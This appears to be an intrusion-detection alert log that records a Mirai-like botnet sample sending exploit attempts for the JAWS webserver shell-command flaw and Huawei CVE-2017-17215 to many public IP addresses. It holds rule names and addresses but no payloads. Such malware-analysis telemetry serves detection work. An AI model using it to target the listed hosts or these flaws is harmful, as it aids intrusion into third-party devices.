                                                    2024-12-03T23:02:22.518805+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235644850.215.179.24680TCP
                                                    2024-12-03T23:02:22.518805+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235644850.215.179.24680TCP
                                                    2024-12-03T23:02:22.518873+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235723632.44.232.3980TCP
                                                    2024-12-03T23:02:22.518873+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235723632.44.232.3980TCP
                                                    2024-12-03T23:02:22.525108+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344896155.90.17.17080TCP
                                                    2024-12-03T23:02:22.525108+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344896155.90.17.17080TCP
                                                    2024-12-03T23:02:22.534520+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235548283.106.224.1880TCP
                                                    2024-12-03T23:02:22.534520+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235548283.106.224.1880TCP
                                                    2024-12-03T23:02:22.534655+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336026122.22.64.4180TCP
                                                    2024-12-03T23:02:22.534655+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336026122.22.64.4180TCP
                                                    2024-12-03T23:02:22.534738+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354516110.32.215.18480TCP
                                                    2024-12-03T23:02:22.534738+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354516110.32.215.18480TCP
                                                    2024-12-03T23:02:22.744418+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350054217.215.79.6180TCP
                                                    2024-12-03T23:02:22.744418+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350054217.215.79.6180TCP
                                                    2024-12-03T23:02:22.775318+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23406342.117.9.23580TCP
                                                    2024-12-03T23:02:22.775318+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23406342.117.9.23580TCP
                                                    2024-12-03T23:02:22.775554+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358554133.146.239.2580TCP
                                                    2024-12-03T23:02:22.775554+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358554133.146.239.2580TCP
                                                    2024-12-03T23:02:22.784562+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348358128.79.224.16280TCP
                                                    2024-12-03T23:02:22.784562+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348358128.79.224.16280TCP
                                                    2024-12-03T23:02:22.784696+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352108147.230.188.10080TCP
                                                    2024-12-03T23:02:22.784696+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352108147.230.188.10080TCP
                                                    2024-12-03T23:02:22.784784+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334968197.237.200.9037215TCP
                                                    2024-12-03T23:02:22.800107+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332836208.73.48.6680TCP
                                                    2024-12-03T23:02:22.800107+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332836208.73.48.6680TCP
                                                    2024-12-03T23:02:22.822241+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338966113.124.149.12680TCP
                                                    2024-12-03T23:02:22.822241+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338966113.124.149.12680TCP
                                                    2024-12-03T23:02:22.822258+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350560165.33.196.7580TCP
                                                    2024-12-03T23:02:22.822258+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350560165.33.196.7580TCP
                                                    2024-12-03T23:02:22.831194+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334206199.103.66.4480TCP
                                                    2024-12-03T23:02:22.831194+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334206199.103.66.4480TCP
                                                    2024-12-03T23:02:22.831330+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345228173.121.214.13080TCP
                                                    2024-12-03T23:02:22.831330+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345228173.121.214.13080TCP
                                                    2024-12-03T23:02:22.831421+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356662194.1.252.180TCP
                                                    2024-12-03T23:02:22.831421+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356662194.1.252.180TCP
                                                    2024-12-03T23:02:22.865032+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234225878.227.173.20280TCP
                                                    2024-12-03T23:02:22.865032+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234225878.227.173.20280TCP
                                                    2024-12-03T23:02:22.884728+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235743650.205.67.10380TCP
                                                    2024-12-03T23:02:22.884728+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235743650.205.67.10380TCP
                                                    2024-12-03T23:02:22.900105+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334550101.32.81.23580TCP
                                                    2024-12-03T23:02:22.900105+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334550101.32.81.23580TCP
                                                    2024-12-03T23:02:22.947321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351722192.140.240.2780TCP
                                                    2024-12-03T23:02:22.947321+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351722192.140.240.2780TCP
                                                    2024-12-03T23:02:22.956493+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338628131.249.228.8080TCP
                                                    2024-12-03T23:02:22.956493+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338628131.249.228.8080TCP
                                                    2024-12-03T23:02:22.971923+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335456133.207.20.23480TCP
                                                    2024-12-03T23:02:22.971923+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335456133.207.20.23480TCP
                                                    2024-12-03T23:02:22.972078+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359898223.66.174.2480TCP
                                                    2024-12-03T23:02:22.972078+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359898223.66.174.2480TCP
                                                    2024-12-03T23:02:23.556785+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357156156.4.226.10937215TCP
                                                    2024-12-03T23:02:23.571968+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235712641.34.110.9837215TCP
                                                    2024-12-03T23:02:23.572097+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234289041.93.86.18637215TCP
                                                    2024-12-03T23:02:23.581298+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351574197.77.114.8037215TCP
                                                    2024-12-03T23:02:23.581600+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359790156.3.237.12937215TCP
                                                    2024-12-03T23:02:23.603189+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233338041.29.70.15837215TCP
                                                    2024-12-03T23:02:23.603331+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235010841.59.229.5937215TCP
                                                    2024-12-03T23:02:23.628541+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344028156.36.174.24237215TCP
                                                    2024-12-03T23:02:23.659790+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235267641.231.63.7137215TCP
                                                    2024-12-03T23:02:23.697212+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233512480.159.50.23180TCP
                                                    2024-12-03T23:02:23.697212+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233512480.159.50.23180TCP
                                                    2024-12-03T23:02:23.697447+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333260200.230.245.16880TCP
                                                    2024-12-03T23:02:23.697447+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333260200.230.245.16880TCP
                                                    2024-12-03T23:02:23.706395+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343854131.130.228.10580TCP
                                                    2024-12-03T23:02:23.706395+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343854131.130.228.10580TCP
                                                    2024-12-03T23:02:23.759890+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337090125.167.185.180TCP
                                                    2024-12-03T23:02:23.759890+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337090125.167.185.180TCP
                                                    2024-12-03T23:02:23.759894+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333554208.46.118.21380TCP
                                                    2024-12-03T23:02:23.759894+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333554208.46.118.21380TCP
                                                    2024-12-03T23:02:23.759904+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348102210.246.226.21880TCP
                                                    2024-12-03T23:02:23.759904+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348102210.246.226.21880TCP
                                                    2024-12-03T23:02:23.775456+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339734148.179.123.6580TCP
                                                    2024-12-03T23:02:23.775456+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339734148.179.123.6580TCP
                                                    2024-12-03T23:02:23.831514+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233757071.223.65.6980TCP
                                                    2024-12-03T23:02:23.831514+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233757071.223.65.6980TCP
                                                    2024-12-03T23:02:23.846928+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235087897.197.44.17480TCP
                                                    2024-12-03T23:02:23.846928+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235087897.197.44.17480TCP
                                                    2024-12-03T23:02:24.713570+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349990197.249.234.11437215TCP
                                                    2024-12-03T23:02:24.754041+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235679441.99.146.18237215TCP
                                                    2024-12-03T23:02:24.760291+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359106197.50.113.3937215TCP
                                                    2024-12-03T23:02:24.769483+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333932156.124.218.20437215TCP
                                                    2024-12-03T23:02:24.776343+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235106846.102.189.21380TCP
                                                    2024-12-03T23:02:24.776343+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235106846.102.189.21380TCP
                                                    2024-12-03T23:02:24.776354+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235932668.241.111.7380TCP
                                                    2024-12-03T23:02:24.776354+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235932668.241.111.7380TCP
                                                    2024-12-03T23:02:24.776359+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234878841.191.132.3437215TCP
                                                    2024-12-03T23:02:24.785338+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235219641.28.29.2737215TCP
                                                    2024-12-03T23:02:24.791765+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235903491.25.207.21280TCP
                                                    2024-12-03T23:02:24.791765+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235903491.25.207.21280TCP
                                                    2024-12-03T23:02:24.806577+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233583462.81.97.7180TCP
                                                    2024-12-03T23:02:24.806577+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233583462.81.97.7180TCP
                                                    2024-12-03T23:02:24.815854+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359008210.235.160.6080TCP
                                                    2024-12-03T23:02:24.815854+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359008210.235.160.6080TCP
                                                    2024-12-03T23:02:24.822167+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333366168.40.98.6680TCP
                                                    2024-12-03T23:02:24.822167+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333366168.40.98.6680TCP
                                                    2024-12-03T23:02:24.822262+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350504183.72.35.24180TCP
                                                    2024-12-03T23:02:24.822262+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350504183.72.35.24180TCP
                                                    2024-12-03T23:02:24.822333+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23586529.244.198.2480TCP
                                                    2024-12-03T23:02:24.822333+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23586529.244.198.2480TCP
                                                    2024-12-03T23:02:24.822439+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336486207.6.103.7380TCP
                                                    2024-12-03T23:02:24.822439+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336486207.6.103.7380TCP
                                                    2024-12-03T23:02:24.822535+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335888186.91.189.15480TCP
                                                    2024-12-03T23:02:24.822535+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335888186.91.189.15480TCP
                                                    2024-12-03T23:02:24.822715+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233297662.140.60.24780TCP
                                                    2024-12-03T23:02:24.822715+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233297662.140.60.24780TCP
                                                    2024-12-03T23:02:24.822846+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355418194.136.29.12980TCP
                                                    2024-12-03T23:02:24.822846+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355418194.136.29.12980TCP
                                                    2024-12-03T23:02:24.823026+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343092103.233.244.3380TCP
                                                    2024-12-03T23:02:24.823026+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343092103.233.244.3380TCP
                                                    2024-12-03T23:02:24.831249+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334780115.232.232.11280TCP
                                                    2024-12-03T23:02:24.831249+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334780115.232.232.11280TCP
                                                    2024-12-03T23:02:24.831424+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234580067.200.144.19180TCP
                                                    2024-12-03T23:02:24.831424+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234580067.200.144.19180TCP
                                                    2024-12-03T23:02:24.831601+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345034110.127.114.23280TCP
                                                    2024-12-03T23:02:24.831601+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345034110.127.114.23280TCP
                                                    2024-12-03T23:02:24.831727+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235556249.174.199.23080TCP
                                                    2024-12-03T23:02:24.831727+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235556249.174.199.23080TCP
                                                    2024-12-03T23:02:24.831858+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236021677.229.189.17780TCP
                                                    2024-12-03T23:02:24.831858+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236021677.229.189.17780TCP
                                                    2024-12-03T23:02:24.837592+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343906154.12.222.9980TCP
                                                    2024-12-03T23:02:24.837592+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343906154.12.222.9980TCP
                                                    2024-12-03T23:02:24.837680+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235383441.68.184.2137215TCP
                                                    2024-12-03T23:02:24.837830+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234394482.36.75.21780TCP
                                                    2024-12-03T23:02:24.837830+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234394482.36.75.21780TCP
                                                    2024-12-03T23:02:24.847149+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336900166.87.180.3080TCP
                                                    2024-12-03T23:02:24.847149+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336900166.87.180.3080TCP
                                                    2024-12-03T23:02:24.880627+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347234197.124.106.17537215TCP
                                                    2024-12-03T23:02:24.880650+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235520041.67.6.637215TCP
                                                    2024-12-03T23:02:24.885344+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352656156.112.179.15337215TCP
                                                    2024-12-03T23:02:24.900523+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341052156.13.14.22037215TCP
                                                    2024-12-03T23:02:24.909635+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348996197.229.68.10237215TCP
                                                    2024-12-03T23:02:24.947292+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332922192.71.11.23280TCP
                                                    2024-12-03T23:02:24.947292+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332922192.71.11.23280TCP
                                                    2024-12-03T23:02:25.072397+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350940197.116.245.9237215TCP
                                                    2024-12-03T23:02:25.103533+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233994041.22.66.10137215TCP
                                                    2024-12-03T23:02:25.103541+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.236063241.216.151.17737215TCP
                                                    2024-12-03T23:02:25.128436+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235999041.235.147.11937215TCP
                                                    2024-12-03T23:02:25.276090+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234110857.128.103.18380TCP
                                                    2024-12-03T23:02:25.276090+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234110857.128.103.18380TCP
                                                    2024-12-03T23:02:25.356075+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356260187.32.72.15380TCP
                                                    2024-12-03T23:02:25.356075+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356260187.32.72.15380TCP
                                                    2024-12-03T23:02:25.362893+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.234884441.146.239.21537215TCP
                                                    2024-12-03T23:02:25.378087+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351124156.184.97.6737215TCP
                                                    2024-12-03T23:02:25.409650+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357582197.253.75.1437215TCP
                                                    2024-12-03T23:02:25.869872+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350348156.123.247.8837215TCP
                                                    2024-12-03T23:02:25.870049+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333736156.172.76.22637215TCP
                                                    2024-12-03T23:02:25.900490+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343848156.178.39.7137215TCP
                                                    2024-12-03T23:02:25.909514+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341294156.49.222.9137215TCP
                                                    2024-12-03T23:02:25.909617+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353348197.156.108.16737215TCP
                                                    2024-12-03T23:02:25.909815+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235699841.138.109.13737215TCP
                                                    2024-12-03T23:02:25.931444+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235339037.38.112.10580TCP
                                                    2024-12-03T23:02:25.931444+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235339037.38.112.10580TCP
                                                    2024-12-03T23:02:25.931562+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342038133.63.128.15280TCP
                                                    2024-12-03T23:02:25.931562+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342038133.63.128.15280TCP
                                                    2024-12-03T23:02:25.931849+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349984172.129.180.8980TCP
                                                    2024-12-03T23:02:25.931849+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349984172.129.180.8980TCP
                                                    2024-12-03T23:02:25.931892+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233963851.202.147.13480TCP
                                                    2024-12-03T23:02:25.931892+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233963851.202.147.13480TCP
                                                    2024-12-03T23:02:25.931922+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235328249.241.24.10680TCP
                                                    2024-12-03T23:02:25.931922+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235328249.241.24.10680TCP
                                                    2024-12-03T23:02:25.947650+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346292211.247.224.21180TCP
                                                    2024-12-03T23:02:25.947650+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346292211.247.224.21180TCP
                                                    2024-12-03T23:02:25.947711+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332950203.233.83.22780TCP
                                                    2024-12-03T23:02:25.947711+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2332950203.233.83.22780TCP
                                                    2024-12-03T23:02:25.947790+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351518145.255.225.14280TCP
                                                    2024-12-03T23:02:25.947790+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351518145.255.225.14280TCP
                                                    2024-12-03T23:02:25.947941+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234317673.84.140.19080TCP
                                                    2024-12-03T23:02:25.947941+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234317673.84.140.19080TCP
                                                    2024-12-03T23:02:25.947959+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235719454.125.50.11180TCP
                                                    2024-12-03T23:02:25.947959+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235719454.125.50.11180TCP
                                                    2024-12-03T23:02:25.956594+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233619871.107.70.5880TCP
                                                    2024-12-03T23:02:25.956594+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233619871.107.70.5880TCP
                                                    2024-12-03T23:02:25.956691+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354090177.240.197.15880TCP
                                                    2024-12-03T23:02:25.956691+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354090177.240.197.15880TCP
                                                    2024-12-03T23:02:25.956810+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344704197.104.106.5137215TCP
                                                    2024-12-03T23:02:25.956907+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350942137.150.89.23280TCP
                                                    2024-12-03T23:02:25.956907+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350942137.150.89.23280TCP
                                                    2024-12-03T23:02:25.962678+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359728157.144.82.4480TCP
                                                    2024-12-03T23:02:25.962678+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359728157.144.82.4480TCP
                                                    2024-12-03T23:02:25.962765+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356432126.89.116.14980TCP
                                                    2024-12-03T23:02:25.962765+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356432126.89.116.14980TCP
                                                    2024-12-03T23:02:25.972035+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233362089.128.150.9280TCP
                                                    2024-12-03T23:02:25.972035+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233362089.128.150.9280TCP
                                                    2024-12-03T23:02:25.978415+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233905462.206.122.11280TCP
                                                    2024-12-03T23:02:25.978415+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233905462.206.122.11280TCP
                                                    2024-12-03T23:02:25.978544+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234657277.166.16.19380TCP
                                                    2024-12-03T23:02:25.978544+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234657277.166.16.19380TCP
                                                    2024-12-03T23:02:26.003421+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235744462.205.39.10980TCP
                                                    2024-12-03T23:02:26.003421+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235744462.205.39.10980TCP
                                                    2024-12-03T23:02:26.003538+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335468165.237.166.8480TCP
                                                    2024-12-03T23:02:26.003538+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335468165.237.166.8480TCP
                                                    2024-12-03T23:02:26.009593+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234178670.228.253.24080TCP
                                                    2024-12-03T23:02:26.009593+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234178670.228.253.24080TCP
                                                    2024-12-03T23:02:26.018855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333240141.175.5.22380TCP
                                                    2024-12-03T23:02:26.018855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333240141.175.5.22380TCP
                                                    2024-12-03T23:02:26.197281+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344038185.51.90.9880TCP
                                                    2024-12-03T23:02:26.197281+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344038185.51.90.9880TCP
                                                    2024-12-03T23:02:26.228604+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360564174.237.64.8880TCP
                                                    2024-12-03T23:02:26.228604+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360564174.237.64.8880TCP
